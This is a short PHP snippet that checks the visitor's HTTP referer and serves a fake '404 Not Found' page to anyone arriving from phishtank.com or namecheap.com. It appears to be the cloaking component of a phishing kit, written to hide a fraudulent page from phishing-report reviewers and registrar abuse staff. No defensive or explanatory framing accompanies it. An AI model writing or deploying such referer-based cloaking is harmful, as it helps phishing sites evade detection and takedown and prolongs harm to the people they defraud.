<?php
if (isset($_SERVER['HTTP_REFERER'])) {
    $ref = strtolower($_SERVER['HTTP_REFERER']);
    if (strpos($ref, "phishtank.com") !== false || strpos($ref, "namecheap.com") !== false) {
        header("HTTP/1.0 404 Not Found");
        echo "<html><head><title>404 Not Found</title></head><body><h1>404 Not Found</h1></body></html>";
        exit;
    }
}
?>
